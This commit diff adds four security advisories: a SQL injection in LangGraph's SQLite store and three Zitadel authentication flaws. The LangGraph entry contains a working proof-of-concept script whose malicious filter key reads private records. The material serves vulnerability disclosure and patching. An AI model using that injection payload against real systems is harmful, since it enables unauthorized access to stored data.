Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit abfbb63720c0 · 2025-10-29T22:22:57.000Z
GHSA-7p73-8jqx-23r8 GHSA-cfjq-28r2-4jv5 GHSA-mwmh-7px9-4c23 GHSA-xrw9-r35x-x878
diff --git a/advisories/github-reviewed/2025/10/GHSA-7p73-8jqx-23r8/GHSA-7p73-8jqx-23r8.json b/advisories/github-reviewed/2025/10/GHSA-7p73-8jqx-23r8/GHSA-7p73-8jqx-23r8.json
@@ -0,0 +1,68 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7p73-8jqx-23r8",
+  "modified": "2025-10-29T22:21:43Z",
+  "published": "2025-10-29T22:21:43Z",
+  "aliases": [
+    "CVE-2025-64104"
+  ],
+  "summary": "LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore",
+  "details": "### Summary\nLangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.\n\n### Details\n[`/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py`](https://github.com/langchain-ai/langgraph/blob/ee5d052a07aadd76dae123a27009ea0a3694fa0a/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py#L407)\n\nThe key portion of the JSON path is concatenated directly into the SQL string without sanitation. There's a few different occurrences within the file.\n\n```python\n  filter_conditions.append(\n      \"json_extract(value, '$.\"\n      + key  # <-- Directly concatenated, no escaping!\n      + \"') = '\"\n      + value.replace(\"'\", \"''\")  # <-- Only value is escaped\n      + \"'\"\n  )\n```\n\n### Who is affected\n\nThis issue affects **only developers or projects that directly use the `checkpoint-sqlite` store**. \n\nAn application is vulnerable only if it:\n1. Instantiates the `SqliteStore` from the `checkpoint-sqlite` package, **and**\n2. Builds the `filter` argument using keys derived from **untrusted or user-supplied input** (such as query parameters, request bodies, or other external data).\n\nIf filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.\n\nNote: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\n```python\n#!/usr/bin/env python3\n\"\"\"Minimal SQLite Key Injection POC for LangGraph\"\"\"\n\nfrom langgraph.store.sqlite import SqliteStore\n\n# Create store with test data\nwith SqliteStore.from_conn_string(\":memory:\") as store:\n    store.setup()\n    \n    # Add public and private documents\n    store.put((\"docs\",), \"public\", {\"access\": \"public\", \"data\": \"public info\"})\n    store.put((\"docs\",), \"private\", {\"access\": \"private\", \"data\": \"secret\", \"password\": \"123\"})\n    \n    # Normal query - returns 1 public document\n    normal = store.search((\"docs\",), filter={\"access\": \"public\"})\n    print(f\"Normal query: {len(normal)} docs\")\n    \n    # SQL injection via malicious key\n    malicious_key = \"access') = 'public' OR '1'='1' OR json_extract(value, '$.\"\n    injected = store.search((\"docs\",), filter={malicious_key: \"dummy\"})\n    \n    print(f\"Injected query: {len(injected)} docs\")\n    for doc in injected:\n        if doc.value.get(\"access\") == \"private\":\n            print(f\"LEAKED: {doc.value}\")\n```",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "langgraph-checkpoint-sqlite"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.0.11"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2.0.10"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64104"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/langchain-ai/langgraph"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-29T22:21:43Z",
+    "nvd_published_at": "2025-10-29T19:15:39Z"
+  }
+}
diff --git a/advisories/github-reviewed/2025/10/GHSA-cfjq-28r2-4jv5/GHSA-cfjq-28r2-4jv5.json b/advisories/github-reviewed/2025/10/GHSA-cfjq-28r2-4jv5/GHSA-cfjq-28r2-4jv5.json
@@ -0,0 +1,107 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-cfjq-28r2-4jv5",
+  "modified": "2025-10-29T22:21:27Z",
+  "published": "2025-10-29T22:21:27Z",
+  "aliases": [
+    "CVE-2025-64103"
+  ],
+  "summary": "Zitadel May Bypass Second Authentication Factor",
+  "details": "### Summary\n\nA vulnerability in Zitadel's token verification prematurely marked sessions as authenticated when only one factor was verified. \n\n### Impact\n\nZitadel provides an API for managing sessions, enabling custom login experiences in a dedicated UI or direct integration into applications. Session Tokens are issued for active sessions, which can be used as Bearer tokens to call the Zitadel API.\n\nStarting from 2.55.0 (see other affected versions below), Zitadel only required multi factor authentication in case the login policy has either enabled `requireMFA` or `requireMFAForLocalUsers`. If a user has set up MFA without this requirement, Zitadel would consider single factor auhtenticated sessions as valid as well and not require multiple factors.\n\nBypassing second authentication factors weakens multifactor authentication and enables attackers to bypass the more secure factor. An attacker can target the TOTP code alone, only six digits, bypassing password verification entirely and potentially compromising accounts with 2FA enabled.\n\n### Affected Versions\n\nSystems using the session API (v2 beta and v2) directly or via the new login UI in the following versions are affected:\n- **4.x**: `4.0.0` to `4.5.0` (including RC versions)\n- **3.x**: `3.0.0` to `3.4.2` (including RC versions)\n- **2.x**: `v2.53.6` to `v2.53.9`,  `v2.54.3` to `v2.54.10`, `2.55.0` to `2.71.17`\n\n### Patches\n\nThe vulnerability has been addressed in the latest releases. The patch resolves the issue by requiring a configured second factor regardless of the login policies `requireMFA` or `requireMFAForLocalUsers` configuration.\n\n4.x: Upgrade to >=[4.6.0](https://github.com/zitadel/zitadel/releases/tag/v4.6.0)\n3.x: Update to >=[3.4.3](https://github.com/zitadel/zitadel/releases/tag/v3.4.3)\n2.x: Update to >=[2.71.18](https://github.com/zitadel/zitadel/releases/tag/v2.71.18)\n\n### Workarounds\n\nThe recommended solution is to update Zitadel to a patched version.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)\n\n### Credits\n\nThis vulnerability was found by [zentrust partners GmbH](https://zentrust.partners) during a scheduled penetration test. Thank you to the analysts Martin Tschirsich, Joud Zakharia, Christopher Baumann.\nThe full report will be made public after the complete review.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/zitadel/zitadel/v2"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "2.53.6"
+            },
+            {
+              "last_affected": "2.53.9"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/zitadel/zitadel/v2"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "2.54.3"
+            },
+            {
+              "last_affected": "2.54.10"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/zitadel/zitadel/v2"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "2.55.0"
+            },
+            {
+              "fixed": "2.71.18"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2.71.17"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-cfjq-28r2-4jv5"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64103"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/zitadel/zitadel/commit/b284f8474eed0cba531905101619e7ae7963156b"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/zitadel/zitadel"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-287",
+      "CWE-308"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-29T22:21:27Z",
+    "nvd_published_at": "2025-10-29T19:15:39Z"
+  }
+}
diff --git a/advisories/github-reviewed/2025/10/GHSA-mwmh-7px9-4c23/GHSA-mwmh-7px9-4c23.json b/advisories/github-reviewed/2025/10/GHSA-mwmh-7px9-4c23/GHSA-mwmh-7px9-4c23.json
@@ -0,0 +1,66 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-mwmh-7px9-4c23",
+  "modified": "2025-10-29T22:20:50Z",
+  "published": "2025-10-29T22:20:50Z",
+  "aliases": [
+    "CVE-2025-64101"
+  ],
+  "summary": "ZITADEL Vulnerable to Account Takeover via Malicious Forwarded Header Injection",
+  "details": "### Impact\n\nA potential vulnerability exists in ZITADEL's password reset mechanism. ZITADEL utilizes the Forwarded or X-Forwarded-Host header from incoming requests to construct the URL for the password reset confirmation link. This link, containing a secret code, is then emailed to the user.\n\nIf an attacker can manipulate these headers (e.g., via host header injection), they could cause ZITADEL to generate a password reset link pointing to a malicious domain controlled by the attacker. If the user clicks this manipulated link in the email, the secret reset code embedded in the URL can be captured by the attacker. This captured code could then be used to reset the user's password and gain unauthorized access to their account.\n\nIt's important to note that this specific attack vector is mitigated for accounts that have Multi-Factor Authentication (MFA) or Passwordless authentication enabled.\n\n### Affected Versions\n\nSystems running one of the following versions:\n- **4.x**: `4.0.0` to `4.5.0` (including RC versions)\n- **3.x**: `3.0.0` to `3.4.2` (including RC versions)\n- **2.x**: `v2.0.0` to `2.71.17`\n\n### Patches\n\nPatched version ensure proper validation of the headers:\n\n4.x: Upgrade to >=[4.6.0](https://github.com/zitadel/zitadel/releases/tag/v4.6.0)\n3.x: Update to >=[3.4.3](https://github.com/zitadel/zitadel/releases/tag/v3.4.3)\n2.x: Update to >=[2.71.18](https://github.com/zitadel/zitadel/releases/tag/v2.71.18)\n\n### Workarounds\n\nThe recommended solution is to update ZITADEL to a patched version.\n\nA ZITADEL fronting proxy can be configured to delete all Forwarded and X-Forwarded-Host header values before sending requests to ZITADEL self-hosted environments.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)\n\n### Credits\n\nThanks to Amit Laish – GE Vernova for finding and reporting the vulnerability.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/zitadel/zitadel/v2"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.71.18"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-mwmh-7px9-4c23"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64101"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/zitadel/zitadel/commit/72a5c33e6ac302b978d564bd049f9364f5a989b1"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/zitadel/zitadel"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-601",
+      "CWE-640"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-29T22:20:50Z",
+    "nvd_published_at": "2025-10-29T19:15:38Z"
+  }
+}
diff --git a/advisories/github-reviewed/2025/10/GHSA-xrw9-r35x-x878/GHSA-xrw9-r35x-x878.json b/advisories/github-reviewed/2025/10/GHSA-xrw9-r35x-x878/GHSA-xrw9-r35x-x878.json
@@ -0,0 +1,65 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-xrw9-r35x-x878",
+  "modified": "2025-10-29T22:21:05Z",
+  "published": "2025-10-29T22:21:05Z",
+  "aliases": [
+    "CVE-2025-64102"
+  ],
+  "summary": "Zitadel allows brute-forcing authentication factors",
+  "details": "### Summary\n\nA vulnerability in Zitadel allowed brute-force attack on OTP, TOTP and password allowing to impersonate the attacked user.\n\n### Impact\n\nAn attacker can perform an online brute-force attack on OTP, TOTP, and passwords. While Zitadel allows preventing online brute force attacks in scenarios like TOTP, Email OTP, or passwords using a lockout mechanism. The mechanism is not enabled by default and can cause a denial of service for the corresponding user if enabled. Additionally, the mitigation strategies were not fully implemented in the more recent resource-based APIs.\n\n### Affected Versions\n\nAll versions within the following ranges, including release candidates (RCs), are affected:\n- **4.x**: `4.0.0` to `4.4.0` (including RC versions)\n- **3.x**: `3.0.0` to `3.4.2` (including RC versions)\n- **2.x**: `v2.0.0` to `2.71.17`\n\n### Patches\n\nThe vulnerability has been addressed in the latest releases. The patch resolves the issue by enforcing the lockout policy on all OTP, TOTP and password checks. Additionally a “tar pit” has been introduced to slow down brute-force attacks by default. Zitadel responses will be delayed by t seconds, where t increases over the number of failed attempts within a given timeframe.\n\n4.x: Upgrade to >=[4.6.0](https://github.com/zitadel/zitadel/releases/tag/v4.6.0)\n3.x: Update to >=[3.4.3](https://github.com/zitadel/zitadel/releases/tag/v3.4.3)\n2.x: Update to >=[2.71.18](https://github.com/zitadel/zitadel/releases/tag/v2.71.18)\n\n### Workarounds\n\nThe recommended solution is to update Zitadel to a patched version.\n\nThe problem might be mitigated by enabling the optional logout policy (\"Password maximum attempts\") or by implementing more strict rate limits.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)\n\n### Credits\n\nThis vulnerability was found by [zentrust partners GmbH](https://zentrust.partners) during a scheduled penetration test. Thank you to the analysts Martin Tschirsich, Joud Zakharia, Christopher Baumann.\nThe full report will be made public after the complete review.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/zitadel/zitadel/v2"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.71.18"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-xrw9-r35x-x878"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64102"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/zitadel/zitadel/commit/b8db8cdf9cc8ea13f461758aef12457f8b7d972a"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/zitadel/zitadel"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-307"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-29T22:21:05Z",
+    "nvd_published_at": "2025-10-29T19:15:38Z"
+  }
+}
